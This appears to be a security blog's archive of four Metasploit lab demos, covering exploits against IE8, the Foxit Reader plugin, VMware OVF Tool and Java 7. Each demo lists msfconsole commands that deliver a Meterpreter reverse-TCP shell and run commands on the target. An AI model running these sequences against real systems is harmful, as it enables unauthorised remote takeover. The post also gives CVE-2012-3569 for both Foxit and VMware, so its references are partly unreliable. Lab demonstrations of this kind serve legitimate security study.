Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS13-009 Microsoft Internet Explorer SLayoutRun UAF Metasploit Demo

Timeline:

Vulnerability discovered and reported to vendor by Scott Bell
Coordinated public release of the vulnerability on 2013-02-12
Metasploit PoC provided on 2013-02-21

PoC provided by:

Scott Bell

Reference(s):

CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009

Affected version(s):

Internet Explorer 8

Tested on Windows XP Pro SP3 with:

Internet Explorer 8

Description:

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer: a CParaElement node is released while CDoc still keeps a reference to it, and the freed memory is reused when a CDoc relayout is performed.

Commands:

use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

Timeline:

Vulnerability discovered by rgod on 2013-01-07
Vendor public release of the vulnerability on 2013-01-14
Metasploit PoC provided on 2013-02-12

PoC provided by:

rgod
Sven Krewitt
juan vazquez

Reference(s):

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s):

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with:

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description:

This module exploits a vulnerability in the Foxit Reader Plugin (npFoxitReaderPlugin.dll). When PDF files are loaded from remote hosts, an overly long query string in the URL causes a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands:

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-3569 VMware OVF Tool Format String Vulnerability Metasploit Demo

Timeline:

Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability on 2012-11-08
Metasploit PoC provided on 2013-02-04

PoC provided by:

Jeremy Brown
juan vazquez

Reference(s):

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s):

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with:

VMware OVF Tool 2.1

Description:

This module exploits a format string vulnerability in VMware OVF Tool 2.1 for Windows. The vulnerability is triggered when error messages are printed while parsing a malformed OVF file. The module has been tested successfully with VMware OVF Tool 2.1 on Windows XP SP3.

Commands:

use exploit/windows/browser/ovftool_format_string
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Timeline:

Vulnerability patched by Oracle in the October 2012 Critical Patch Update (CPU)
Metasploit PoC provided on 2013-01-22

PoC provided by:

Unknown
juan vazquez

Reference(s):

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s):

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with:

Internet Explorer 10
Oracle Java 7 Update 7

Description:

This module abuses the MethodHandle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Commands:

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo